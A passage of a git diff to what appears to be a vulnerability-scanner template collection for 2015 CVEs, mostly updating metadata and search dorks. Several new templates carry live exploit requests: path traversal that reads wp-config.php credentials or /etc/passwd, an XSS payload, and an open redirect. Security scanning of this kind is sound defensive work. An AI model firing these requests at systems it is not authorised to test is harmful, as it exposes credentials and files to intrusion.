     - https://nvd.nist.gov/vuln/detail/CVE-2015-1427
+    - http://web.archive.org/web/20210506011817/https://www.securityfocus.com/bid/72585
   classification:
     cve-id: CVE-2015-1427
-  tags: cve,cve2015,elastic,rce,elasticsearch
+  tags: cve,cve2015,elastic,rce,elasticsearch,kev
 
 requests:
   - raw:
diff --git a/cves/2015/CVE-2015-1503.yaml b/cves/2015/CVE-2015-1503.yaml
index 2b30a3db9b..70821ebe5e 100644
--- a/cves/2015/CVE-2015-1503.yaml
+++ b/cves/2015/CVE-2015-1503.yaml
@@ -1,7 +1,7 @@
 id: CVE-2015-1503
 
 info:
-  name: IceWarp Mail Server Directory Traversal
+  name: IceWarp Mail Server <11.1.1 - Directory Traversal
   author: 0x_Akoko
   severity: high
   description: IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.
@@ -9,12 +9,15 @@ info:
     - https://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html
     - http://www.icewarp.com
     - https://nvd.nist.gov/vuln/detail/CVE-2015-1503
+    - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-001/?fid=5614
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2015-1503
     cwe-id: CWE-200
-  tags: cve,cve2015,icewarp,lfi,mail
+  metadata:
+    shodan-query: title:"icewarp"
+  tags: lfi,mail,packetstorm,cve,cve2015,icewarp
 
 requests:
   - method: GET
@@ -32,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/06
diff --git a/cves/2015/CVE-2015-1579.yaml b/cves/2015/CVE-2015-1579.yaml
new file mode 100644
index 0000000000..bf648b2a35
--- /dev/null
+++ b/cves/2015/CVE-2015-1579.yaml
@@ -0,0 +1,44 @@
+id: CVE-2015-1579
+
+info:
+  name: WordPress Slider Revolution - Local File Disclosure
+  author: pussycat0x
+  severity: high
+  description: |
+    Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
+  reference:
+    - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
+    - https://cxsecurity.com/issue/WLB-2021090129
+    - https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-1579
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2015-1579
+    cwe-id: CWE-22
+  metadata:
+    google-query: inurl:/wp-content/plugins/revslider
+  tags: wordpress,wp-plugin,lfi,revslider,wp,wpscan,cve,cve2015
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
+      - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "'DB_NAME'"
+          - "'DB_PASSWORD'"
+          - "'DB_USER'"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/29
diff --git a/cves/2015/CVE-2015-1880.yaml b/cves/2015/CVE-2015-1880.yaml
index 1eadd4aba0..526e4ddfeb 100644
--- a/cves/2015/CVE-2015-1880.yaml
+++ b/cves/2015/CVE-2015-1880.yaml
@@ -1,13 +1,15 @@
 id: CVE-2015-1880
 
 info:
-  name: XSS in Fortigates SSL VPN login page
+  name: Fortinet FortiOS <=5.2.3 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: Cross-site scripting (XSS) vulnerability in the sslvpn login page in Fortinet FortiOS 5.2.x before 5.2.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
+  description: Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2015-1880
     - https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page
+    - http://www.fortiguard.com/advisory/FG-IR-15-005/
+    - http://web.archive.org/web/20210122155324/https://www.securityfocus.com/bid/74652/
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-1880
   classification:
     cve-id: CVE-2015-1880
   tags: cve,cve2015,xss,fortigates,ssl
@@ -33,3 +35,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2015/CVE-2015-2067.yaml b/cves/2015/CVE-2015-2067.yaml
index f4f1cd61f9..ea3890184c 100644
--- a/cves/2015/CVE-2015-2067.yaml
+++ b/cves/2015/CVE-2015-2067.yaml
@@ -1,16 +1,19 @@
 id: CVE-2015-2067
 
 info:
-  name: Magento Server Magmi Plugin - Directory Traversal
+  name: Magento Server MAGMI - Directory Traversal
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+  description: Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
   reference:
     - https://www.exploit-db.com/exploits/35996
     - https://nvd.nist.gov/vuln/detail/CVE-2015-2067
+    - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html
   classification:
     cve-id: CVE-2015-2067
-  tags: cve,cve2015,lfi,magento,magmi,plugin
+  metadata:
+    shodan-query: http.component:"Magento"
+  tags: plugin,edb,packetstorm,cve,cve2015,lfi,magento,magmi
 
 requests:
   - method: GET
@@ -27,3 +30,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-2068.yaml b/cves/2015/CVE-2015-2068.yaml
index 9312b6cfd1..6bf5df4e8a 100644
--- a/cves/2015/CVE-2015-2068.yaml
+++ b/cves/2015/CVE-2015-2068.yaml
@@ -1,17 +1,20 @@
 id: CVE-2015-2068
 
 info:
-  name: Magento Server Magmi Plugin - Cross Site Scripting
+  name: Magento Server Mass Importer - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile
-    parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
+  description: Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
   reference:
     - https://www.exploit-db.com/exploits/35996
+    - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html
     - https://nvd.nist.gov/vuln/detail/CVE-2015-2068
   classification:
     cve-id: CVE-2015-2068
-  tags: cve,cve2015,magento,magmi,xss,plugin
+  metadata:
+    shodan-query: http.component:"Magento"
+    verified: "true"
+  tags: plugin,edb,packetstorm,cve,cve2015,magento,magmi,xss
 
 requests:
   - method: GET
@@ -33,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2015/CVE-2015-2080.yaml b/cves/2015/CVE-2015-2080.yaml
index 41ba31406e..26e8a1b2c2 100644
--- a/cves/2015/CVE-2015-2080.yaml
+++ b/cves/2015/CVE-2015-2080.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2015-2080
     cwe-id: CWE-200
-  tags: cve,cve2015,jetty
+  tags: cve,cve2015,jetty,packetstorm
 
 requests:
   - method: POST
diff --git a/cves/2015/CVE-2015-2166.yaml b/cves/2015/CVE-2015-2166.yaml
index b055475e45..6b70de017b 100644
--- a/cves/2015/CVE-2015-2166.yaml
+++ b/cves/2015/CVE-2015-2166.yaml
@@ -1,16 +1,18 @@
 id: CVE-2015-2166
 
 info:
-  name: Ericsson Drutt MSDP (Instance Monitor) Directory Traversal
+  name: Ericsson Drutt MSDP - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the Instance Monitor in Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI.
+  description: Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.
   reference:
     - https://www.exploit-db.com/exploits/36619
     - https://nvd.nist.gov/vuln/detail/CVE-2015-2166
+    - http://packetstormsecurity.com/files/131233/Ericsson-Drutt-MSDP-Instance-Monitor-Directory-Traversal-File-Access.html
+    - http://web.archive.org/web/20210122142229/https://www.securityfocus.com/bid/73901/
   classification:
     cve-id: CVE-2015-2166
-  tags: cve,cve2015,lfi,ericsson
+  tags: cve,cve2015,lfi,ericsson,edb,packetstorm
 
 requests:
   - method: GET
@@ -27,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-2807.yaml b/cves/2015/CVE-2015-2807.yaml
index 3c4acfcc29..ddf371a6de 100644
--- a/cves/2015/CVE-2015-2807.yaml
+++ b/cves/2015/CVE-2015-2807.yaml
@@ -1,15 +1,19 @@
 id: CVE-2015-2807
 
 info:
-  name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  name: Navis DocumentCloud <0.1.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.
+  description: Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.
   reference:
     - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
+    - https://security.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
+    - https://wordpress.org/plugins/navis-documentcloud/changelog/
     - https://nvd.nist.gov/vuln/detail/CVE-2015-2807
   classification:
     cve-id: CVE-2015-2807
+  metadata:
+    google-query: inurl:"/wp-content/plugins/navis-documentcloud"
   tags: cve,cve2015,wordpress,wp-plugin,xss
 
 requests:
@@ -32,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2015/CVE-2015-3224.yaml b/cves/2015/CVE-2015-3224.yaml
index c8fd037c9d..34a797940a 100644
--- a/cves/2015/CVE-2015-3224.yaml
+++ b/cves/2015/CVE-2015-3224.yaml
@@ -4,7 +4,7 @@ info:
   name: Ruby on Rails Web Console - Remote Code Execution
   author: pdteam
   severity: critical
-  description: "Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb."
+  description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb.
   reference:
     - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/
     - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/
@@ -12,7 +12,7 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2015-3224
   classification:
     cve-id: CVE-2015-3224
-  tags: cve,cve2015,rce,rails,ruby
+  tags: ruby,hackerone,cve,cve2015,rce,rails
 
 requests:
   - method: GET
diff --git a/cves/2015/CVE-2015-3306.yaml b/cves/2015/CVE-2015-3306.yaml
index f11c4e232d..80eee4953e 100644
--- a/cves/2015/CVE-2015-3306.yaml
+++ b/cves/2015/CVE-2015-3306.yaml
@@ -1,15 +1,19 @@
 id: CVE-2015-3306
 
 info:
-  name: ProFTPd RCE
+  name: ProFTPd - Remote Code Execution
   author: pdteam
   severity: high
-  description: The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
+  description: ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
   reference:
     - https://github.com/t0kx/exploit-CVE-2015-3306
+    - https://www.exploit-db.com/exploits/36803/
+    - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-3306
   classification:
     cve-id: CVE-2015-3306
-  tags: cve,cve2015,ftp,rce,network,proftpd
+  tags: cve,cve2015,ftp,rce,network,proftpd,edb
 
 network:
   - inputs:
@@ -31,3 +35,5 @@ network:
         part: raw
         words:
           - "Copy successful"
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-3337.yaml b/cves/2015/CVE-2015-3337.yaml
index d4497a09bf..6a683cf9f6 100644
--- a/cves/2015/CVE-2015-3337.yaml
+++ b/cves/2015/CVE-2015-3337.yaml
@@ -1,15 +1,19 @@
 id: CVE-2015-3337
 
 info:
-  name: Elasticsearch Head plugin LFI
+  name: Elasticsearch - Local File Inclusion
   author: pdteam
   severity: high
-  description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
+  description: Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled.
   reference:
     - https://www.exploit-db.com/exploits/37054/
+    - http://web.archive.org/web/20210121084446/https://www.securityfocus.com/archive/1/535385
+    - https://www.elastic.co/community/security
+    - http://www.debian.org/security/2015/dsa-3241
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-3337
   classification:
     cve-id: CVE-2015-3337
-  tags: cve,cve2015,elastic,lfi,elasticsearch,plugin
+  tags: edb,cve,cve2015,elastic,lfi,elasticsearch,plugin
 
 requests:
   - method: GET
@@ -26,3 +30,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-3648.yaml b/cves/2015/CVE-2015-3648.yaml
index 010991342b..efac6418d7 100644
--- a/cves/2015/CVE-2015-3648.yaml
+++ b/cves/2015/CVE-2015-3648.yaml
@@ -4,13 +4,16 @@ info:
   name: ResourceSpace - Local File inclusion
   author: pikpikcu
   severity: high
-  description: ResourceSpace is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+  description: ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input.
   reference:
     - https://vulners.com/cve/CVE-2015-3648/
-    - https://www.securityfocus.com/bid/75019
+    - http://web.archive.org/web/20210122163815/https://www.securityfocus.com/bid/75019/
+    - http://svn.montala.com/websvn/revision.php?repname=ResourceSpace&path=%2F&rev=6640&peg=6738
+    - http://packetstormsecurity.com/files/132142/ResourceSpace-7.1.6513-Local-File-Inclusion.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-3648
   classification:
     cve-id: CVE-2015-3648
-  tags: cve,cve2015,lfi,resourcespace
+  tags: lfi,resourcespace,packetstorm,cve,cve2015
 
 requests:
   - method: GET
@@ -27,3 +30,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-3897.yaml b/cves/2015/CVE-2015-3897.yaml
index bbda5dbfa1..5090eb4c33 100644
--- a/cves/2015/CVE-2015-3897.yaml
+++ b/cves/2015/CVE-2015-3897.yaml
@@ -1,20 +1,21 @@
 id: CVE-2015-3897
 
 info:
-  name: Bonita BPM 6.5.1 - Unauthenticated Directory Traversal
+  name: Bonita BPM Portal <6.5.3 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: Directory traversal vulnerability in Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.
+  description: Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.
   reference:
     - https://packetstormsecurity.com/files/132237/Bonita-BPM-6.5.1-Directory-Traversal-Open-Redirect.html
     - https://www.bonitasoft.com/
     - https://nvd.nist.gov/vuln/detail/CVE-2015-3897
+    - https://www.htbridge.com/advisory/HTB23259
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2015-3897
     cwe-id: CWE-22
-  tags: cve,cve2015,bonita,lfi,unauth
+  tags: unauth,packetstorm,cve,cve2015,bonita,lfi
 
 requests:
   - method: GET
@@ -36,3 +37,5 @@ requests:
       - type: regex
         regex:
           - "root:[x*]:0:0:"
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-4050.yaml b/cves/2015/CVE-2015-4050.yaml
index 2d3be7d772..29900ea2bc 100644
--- a/cves/2015/CVE-2015-4050.yaml
+++ b/cves/2015/CVE-2015-4050.yaml
@@ -1,12 +1,14 @@
 id: CVE-2015-4050
 
 info:
-  name: ESI unauthorized access
+  name: Symfony - Authentication Bypass
   author: ELSFA7110,meme-lord
   severity: high
-  description: FragmentListener in the HttpKernel component in Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment.
+  description: Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component.
   reference:
     - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access
+    - http://symfony.com/blog/cve-2015-4050-esi-unauthorized-access
+    - http://www.debian.org/security/2015/dsa-3276
     - https://nvd.nist.gov/vuln/detail/CVE-2015-4050
   classification:
     cve-id: CVE-2015-4050
@@ -27,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-4074.yaml b/cves/2015/CVE-2015-4074.yaml
new file mode 100644
index 0000000000..ec54af72e6
--- /dev/null
+++ b/cves/2015/CVE-2015-4074.yaml
@@ -0,0 +1,36 @@
+id: CVE-2015-4074
+
+info:
+  name: Joomla Helpdesk Pro plugin <1.4.0 - Local File Inclusion
+  author: 0x_Akoko
+  severity: high
+  description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.
+  reference:
+    - https://packetstormsecurity.com/files/132766/Joomla-Helpdesk-Pro-XSS-File-Disclosure-SQL-Injection.html
+    - https://www.exploit-db.com/exploits/37666/
+    - https://www.cvedetails.com/cve/CVE-2015-4074
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4074
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2015-4074
+    cwe-id: CWE-22
+  tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by cs on 2022/09/08
diff --git a/cves/2015/CVE-2015-4127.yaml b/cves/2015/CVE-2015-4127.yaml
new file mode 100644
index 0000000000..5d59f8802d
--- /dev/null
+++ b/cves/2015/CVE-2015-4127.yaml
@@ -0,0 +1,39 @@
+id: CVE-2015-4127
+
+info:
+  name: WordPress Church Admin <0.810 - Cross-Site Scripting
+  author: daffainfo
+  severity: medium
+  description: |
+    WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.
+  reference:
+    - https://www.exploit-db.com/exploits/37112
+    - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408
+    - https://wordpress.org/plugins/church-admin/changelog/
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-4127
+  classification:
+    cve-id: CVE-2015-4127
+  tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2015/CVE-2015-4414.yaml b/cves/2015/CVE-2015-4414.yaml
index c3363598a6..9d4911c858 100644
--- a/cves/2015/CVE-2015-4414.yaml
+++ b/cves/2015/CVE-2015-4414.yaml
@@ -1,16 +1,20 @@
 id: CVE-2015-4414
 
 info:
-  name: WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
+  name: WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+  description: WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
   reference:
     - https://www.exploit-db.com/exploits/37274
-    - https://www.cvedetails.com/cve/CVE-2015-4414
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-4414
+    - https://www.exploit-db.com/exploits/37274/
+    - http://packetstormsecurity.com/files/132266/WordPress-SE-HTML5-Album-Audio-Player-1.1.0-Directory-Traversal.html
   classification:
     cve-id: CVE-2015-4414
-  tags: cve,cve2015,wordpress,wp-plugin,lfi
+  metadata:
+    google-query: inurl:"/wp-content/plugins/se-html5-album-audio-player"
+  tags: cve,cve2015,wordpress,wp-plugin,lfi,edb,packetstorm
 
 requests:
   - method: GET
@@ -27,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-4632.yaml b/cves/2015/CVE-2015-4632.yaml
index d34c15d8b4..e0c29e86de 100644
--- a/cves/2015/CVE-2015-4632.yaml
+++ b/cves/2015/CVE-2015-4632.yaml
@@ -4,17 +4,17 @@ info:
   name: Koha 3.20.1 - Directory Traversal
   author: daffainfo
   severity: high
-  description: Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via
-    a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
+  description: Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
   reference:
     - https://www.exploit-db.com/exploits/37388
     - https://www.cvedetails.com/cve/CVE-2015-4632
+    - https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2015-4632
     cwe-id: CWE-22
-  tags: cve,cve2015,lfi
+  tags: cve,cve2015,lfi,edb
 
 requests:
   - method: GET
@@ -30,4 +30,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-4666.yaml b/cves/2015/CVE-2015-4666.yaml
new file mode 100644
index 0000000000..374b84c7b5
--- /dev/null
+++ b/cves/2015/CVE-2015-4666.yaml
@@ -0,0 +1,35 @@
+id: CVE-2015-4666
+
+info:
+  name: Xceedium Xsuite <=2.4.4.5 - Local File Inclusion
+  author: 0x_Akoko
+  severity: high
+  description: Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter.
+  reference:
+    - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt
+    - http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-4666
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2015-4666
+    cwe-id: CWE-22
+  tags: xceedium,xsuite,lfi,packetstorm,cve,cve2015
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2015/CVE-2015-4668.yaml b/cves/2015/CVE-2015-4668.yaml
new file mode 100644
index 0000000000..5b44654f51
--- /dev/null
+++ b/cves/2015/CVE-2015-4668.yaml
@@ -0,0 +1,30 @@
+id: CVE-2015-4668
+
+info:
+  name: Xsuite 2.4.4.5 - Open Redirect
+  author: 0x_Akoko
+  severity: medium
+  description: |
+    Open redirect vulnerability in Xsuite 2.4.4.5 and earlier allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirurl parameter.
+  reference:
+    - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt
+    - https://www.cvedetails.com/cve/CVE-2015-4668
+    - https://vuldb.com/?id.107082
+    - https://www.exploit-db.com/exploits/37708/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2015-4668
+    cwe-id: CWE-601
+  tags: cve,cve2015,redirect,xsuite,xceedium,edb
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/openwin.php?redirurl=http://interact.sh'
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2015/CVE-2015-4694.yaml b/cves/2015/CVE-2015-4694.yaml
index f116177a76..62cb6ae9ef 100644
--- a/cves/2015/CVE-2015-4694.yaml
+++ b/cves/2015/CVE-2015-4694.yaml
@@ -9,12 +9,15 @@ info:
     - https://wordpress.org/plugins/zip-attachments/#developers
     - https://wpscan.com/vulnerability/8047
     - https://nvd.nist.gov/vuln/detail/CVE-2015-4694
+    - http://www.vapid.dhs.org/advisory.php?v=126
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
     cvss-score: 8.6
     cve-id: CVE-2015-4694
     cwe-id: CWE-22
-  tags: lfi,wordpress,cve,cve2015,wp-plugin
+  metadata:
+    google-query: inurl:"/wp-content/plugins/zip-attachments"
+  tags: cve2015,wp-plugin,wpscan,lfi,wordpress,cve
 
 requests:
   - method: GET
diff --git a/cves/2015/CVE-2015-5354.yaml b/cves/2015/CVE-2015-5354.yaml
new file mode 100644
index 0000000000..f20d2dfa3f
--- /dev/null
+++ b/cves/2015/CVE-2015-5354.yaml
@@ -0,0 +1,31 @@
+id: CVE-2015-5354
+
+info:
+  name: Novius OS 5.0.1-elche - Open Redirect
+  author: 0x_Akoko
+  severity: medium
+  description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.
+  reference:
+    - https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html
+    - https://vuldb.com/?id.76181
+    - http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html
+    - https://nvd.nist.gov/vul n/detail/CVE-2015-5354
+  classification:
